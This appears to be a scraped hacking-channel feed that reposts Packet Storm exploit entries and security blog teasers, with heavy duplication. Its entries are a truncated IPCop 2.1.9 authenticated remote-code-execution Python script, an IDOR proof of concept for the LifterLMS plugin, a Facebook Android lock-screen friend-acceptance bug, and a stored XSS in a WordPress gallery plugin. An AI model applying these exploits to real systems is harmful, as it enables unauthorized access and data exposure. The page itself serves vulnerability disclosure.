Hello everyone, this is my first post. I’ve been thinking about writing about my findings for a while, so here we go.Continue reading on Medium » (https://medium.com/@gonzalocarrascosec/fuzzing-idor-admin-takeover-5343bb8f436e?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Fuzzing + IDOR = Admin TakeOver
Hello everyone, this is my first post. I’ve been thinking about writing about my findings for a while, so here we go.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
IPCop 2.1.9 Remote Code Execution
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
IPCop version 2.1.9 authenticated remote code execution exploit.
MD5 |
Download
# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/08/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipcop.org/
# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
# Version: 2.1.9
# Tested on: parrot os 5.7.0-2parrot2-amd64
#!/usr/bin/python3
import requests as R
import os
import sys
import base64
import urllib3
R.packages.urllib3.disable_warnings()
R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
# no pyopenssl support used / needed / available
pass
try:
hostport = sys.argv[1]
assert hostport[:8] == "https://" and hostport[-1] == "/"
url = hostport + "cgi-bin/email.cgi"
username = sys.argv[2].encode()
password = sys.argv[3].encode()
auth = base64.b64encode(username+b":"+password).decode()
command = sys.argv[4]
assert " " in command
except:
print("[-] Usage https://host:port/ username password command(no spaces)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
IPCop 2.1.9 Remote Code Execution
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
IPCop version 2.1.9 authenticated remote code execution exploit.
MD5 |
45746a48f3e976bd5c861e5e77a47282Download
# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/08/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipcop.org/
# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
# Version: 2.1.9
# Tested on: parrot os 5.7.0-2parrot2-amd64
#!/usr/bin/python3
import requests as R
import os
import sys
import base64
import urllib3
R.packages.urllib3.disable_warnings()
R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
# no pyopenssl support used / needed / available
pass
try:
hostport = sys.argv[1]
assert hostport[:8] == "https://" and hostport[-1] == "/"
url = hostport + "cgi-bin/email.cgi"
username = sys.argv[2].encode()
password = sys.argv[3].encode()
auth = base64.b64encode(username+b":"+password).decode()
command = sys.argv[4]
assert " " in command
except:
print("[-] Usage https://host:port/ username password command(no spaces)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
IPCop 2.1.9 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress LifterLMS 4.21.1 Insecure Direct Object Reference
https://3.bp.blogspot.com/-w74A7gxi0bY/WWlvD06cX8I/AAAAAAAAIK4/fcu0jWNFLhIrvrv6B2He7QdGvtDQ7X4rQCLcBGAs/s1600/h131.png
WordPress LifterLMS plugin version 4.21.1 suffers from an insecure direct object reference vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress LifterLMS 4.21.1 Insecure Direct Object Reference
https://3.bp.blogspot.com/-w74A7gxi0bY/WWlvD06cX8I/AAAAAAAAIK4/fcu0jWNFLhIrvrv6B2He7QdGvtDQ7X4rQCLcBGAs/s1600/h131.png
WordPress LifterLMS plugin version 4.21.1 suffers from an insecure direct object reference vulnerability.
MD5 |
0ece90c33c90c47103b0093d1ff1979aDownload
# Exploit Title: WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR
# Date: 2021-05-17
# Exploit Author: captain_hook
# Vendor Homepage: https://lifterlms.com
# Software Link: https://lifterlms.com
# Version: 4.21.1
# Tested on: any
Description
The plugin was affected by an IDOR issue, allowing students to see other student answers and grades
Proof of Concept
- Add 2 users with Student role for the scenario .
- Create A course With a quiz ( I picked True or Flase question for my quiz)
- Set Enrol on Free ( for the ease of scenario )
- Enrol into the Course with Student B and submit your answer to the Course .
The plugin will give a token like :
https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
To Check your answer was true or false.
Now Login as a Student A and Enroll in the Course. You can just use
the URL https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
and reach the Student B answer.
Fixed in version 4.21.2✓
References
https://make.lifterlms.com/2021/05/17/lifterlms-version-4-21-2/
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress LifterLMS 4.21.1 Insecure Direct Object Reference
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Facebook For Android Friend Acceptance
https://2.bp.blogspot.com/-8IZk1MGzGDs/WWlvRc2I8KI/AAAAAAAAINM/SaF41lFV3n4aBJrQBjJ2SaVGr7WaiJo3gCLcBGAs/s1600/h34.png
Facebook for Android is vulnerable to a permission issue which allows anyone with physical access to the Android device, to accept friend requests without unlocking the phone. Facebook does not consider this a security issue. Version 29.0.0.29.120 on Android 10 is affected.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Facebook For Android Friend Acceptance
https://2.bp.blogspot.com/-8IZk1MGzGDs/WWlvRc2I8KI/AAAAAAAAINM/SaF41lFV3n4aBJrQBjJ2SaVGr7WaiJo3gCLcBGAs/s1600/h34.png
Facebook for Android is vulnerable to a permission issue which allows anyone with physical access to the Android device, to accept friend requests without unlocking the phone. Facebook does not consider this a security issue. Version 29.0.0.29.120 on Android 10 is affected.
MD5 |
83ec7a204f65dd0e22598c7ab90bc4d3Download
Author - Sivanesh Ashok | @sivaneshashok | stazot.com
Date : 2021-08-03
Vendor : https://facebook.com/
Version : *
Tested on : Version 329.0.0.29.120, Android 10
Last Modified : 2021-08-10
--[ Bug Description
Facebook for Android is vulnerable to a permission issue which allows
anyone with physical access to the Android device, to accept friend
requests without unlocking the phone. The bug works when the device's lock
screen notification setting is set to "Show sensitive content when locked".
The victim user who set "Show sensitive content when locked", would not
know that the app also allows such sensitive action to be performed when
locked.
An attacker who has access to the victim's locked phone will be able to add
the victim as a friend and collect personal information about the victim
such as email, DoB, check-ins, pictures and other information that the
victim shared to be visible only to their friends.
--[ Steps to reproduce
As the attacker:
1. Get your hands on the victim's locked phone.
2. Send friend request to the victim.
3. See the notification about your friend request on the victim's locked
phone.
4. Expand the friend request and touch the Confirm button.
5. Note that you are now friends with the victim.
6. Check the information that the victim has shared only with their friends.
--[ Proof of Concept
Here is a video PoC of this bug - https://youtu.be/RbBspN-0r-U
--[ Responsible Disclosure
I reported the bug to Facebook, and they seem to not consider this a valid
security, "as the user is in control of their notifications and can prevent
this kind of scenarios by adjusting their phone's settings". An interesting
decision, since the user only wants to "Show sensitive content when
locked", and not "Modify sensitive content when locked". Also, other push
notifications on Facebook/Messenger/Instagram do not behave the same. So, I
think it is worth a patch. Wonder if Facebook will consider it a security
risk if it was possible to accept follow requests to a private Instagram
account from a locked phone.
--[ Contact
Name : Sivanesh Ashok
Twitter : @sivaneshashok
Website : https://stazot.com
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Facebook For Android Friend Acceptance
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Picture Gallery 1.4.2 Cross Site Scripting
https://4.bp.blogspot.com/-hp3wB9AXd0k/WWlvDY5V44I/AAAAAAAAIKs/ScSIhWVAvDAhjeMkIwqbNby9r3gKQvOEgCLcBGAs/s1600/h128.png
WordPress Picture Gallery plugin version 1.4.2 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Picture Gallery 1.4.2 Cross Site Scripting
https://4.bp.blogspot.com/-hp3wB9AXd0k/WWlvDY5V44I/AAAAAAAAIKs/ScSIhWVAvDAhjeMkIwqbNby9r3gKQvOEgCLcBGAs/s1600/h128.png
WordPress Picture Gallery plugin version 1.4.2 suffers from a persistent cross site scripting vulnerability.
MD5 |
2c89d2321e102b5163520d48361ab116Download
# Exploit Title: WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)
# Date: 2021-08-06
# Exploit Author: Aryan Chehreghani
# Software Link: https://wordpress.org/plugins/picture-gallery/
# Version: 1.4.2
# Tested on: Windows 10
How to Reproduce this Vulnerability:
1. Install WordPress 5.8
2. Install and activate Picture Gallery - Frontend Image Uploads, AJAX Photo List
3. Navigate to admin menu wrap >> Picture Gallery >> Options >> Access Control Tab >> enter the XSS payload into the Edit Content URL input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: ">
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Picture Gallery 1.4.2 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
ChangeTower : Tool To Help You Watch Changes In Webpages And Get Notified Of Any Changes
ChangeTower is intended to help you watch changes in webpages and get notified of any changes written in GoThis tools is good to know the web pages are update something or not to work on the new site before others. Installation Instructions ChangeTower requires go1.16+ to install successfully. Run the following command to get the […]
The post ChangeTower : Tool To Help You Watch Changes In Webpages And Get Notified Of Any Changes appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
ChangeTower : Tool To Help You Watch Changes In Webpages And Get Notified Of Any Changes
ChangeTower is intended to help you watch changes in webpages and get notified of any changes written in GoThis tools is good to know the web pages are update something or not to work on the new site before others. Installation Instructions ChangeTower requires go1.16+ to install successfully. Run the following command to get the […]
The post ChangeTower : Tool To Help You Watch Changes In Webpages And Get Notified Of Any Changes appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
ChangeTower : Tool To Help You Watch Changes In Webpages
ChangeTower is intended to help you watch changes in webpages and get notified of any changes written in Go.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
WARCannon : High Speed/Low Cost CommonCrawl RegExp In Node.js
WARCannon was built to simplify and cheapify the process of ‘grepping the internet’. With WARCannon, you can: Build and test regex patterns against real Common Crawl data Easily load Common Crawl datasets for parallel processing Scale compute capabilities to asynchronously crunch through WARCs at frankly unreasonable capacity. Store and easily retrieve the results How It […]
The post WARCannon : High Speed/Low Cost CommonCrawl RegExp In Node.js appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
WARCannon : High Speed/Low Cost CommonCrawl RegExp In Node.js
WARCannon was built to simplify and cheapify the process of ‘grepping the internet’. With WARCannon, you can: Build and test regex patterns against real Common Crawl data Easily load Common Crawl datasets for parallel processing Scale compute capabilities to asynchronously crunch through WARCs at frankly unreasonable capacity. Store and easily retrieve the results How It […]
The post WARCannon : High Speed/Low Cost CommonCrawl RegExp In Node.js appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
WARCannon : High Speed/Low Cost CommonCrawl RegExp In Node.js
WARCannon was built to simplify and cheapify the process of 'grepping the internet'. Build and test regex patterns against real CC Data.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Bug Hunting PhoenixRadioBali [ SQL Injection ]
https://cdn-images-1.medium.com/max/2560/1*6y5E7hR3pMWd5afjIJ7dIw.png
Helo semuanya, back lagi bersama saya, disini saya akan membahas kegiatan bug hunting yang saya lakukan beberapa hari belakangan ini pada…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Bug Hunting PhoenixRadioBali [ SQL Injection ]
https://cdn-images-1.medium.com/max/2560/1*6y5E7hR3pMWd5afjIJ7dIw.png
Helo semuanya, back lagi bersama saya, disini saya akan membahas kegiatan bug hunting yang saya lakukan beberapa hari belakangan ini pada…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Hunting PhoenixRadioBali [ SQL Injection ]
Helo semuanya, back lagi bersama saya, disini saya akan membahas kegiatan bug hunting yang saya lakukan beberapa hari belakangan ini pada…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Coveted DEFCON “Black Badge”
https://cdn-images-1.medium.com/max/2084/1*2AlIP2hhJtioll-nh2rzLw.png
Adobe continually invests in both cross-industry collaboration as well as in ongoing development of the technical skills of our security…
Continue reading on Adobe Tech Blog »
___________________________
@hacking_Attack
@Hacking_Video
The Coveted DEFCON “Black Badge”
https://cdn-images-1.medium.com/max/2084/1*2AlIP2hhJtioll-nh2rzLw.png
Adobe continually invests in both cross-industry collaboration as well as in ongoing development of the technical skills of our security…
Continue reading on Adobe Tech Blog »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The Coveted DEFCON “Black Badge”
Adobe continually invests in both cross-industry collaboration as well as in ongoing development of the technical skills of our security…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hacking the Tenda AC10–1200 Router Part 3: Yet Another Buffer Overflow
https://cdn-images-1.medium.com/max/921/1*CcGSvTTqL4XnAUSmatjDHQ.png
Hi. This is my third writeup in my hacking the tenda ac10 series where i try to get a cve. Lets get started.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hacking the Tenda AC10–1200 Router Part 3: Yet Another Buffer Overflow
https://cdn-images-1.medium.com/max/921/1*CcGSvTTqL4XnAUSmatjDHQ.png
Hi. This is my third writeup in my hacking the tenda ac10 series where i try to get a cve. Lets get started.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hacking the Tenda AC10–1200 Router Part 3: Yet Another Buffer Overflow
Hi. This is my third writeup in my hacking the tenda ac10 series where i try to get a cve. Lets get started.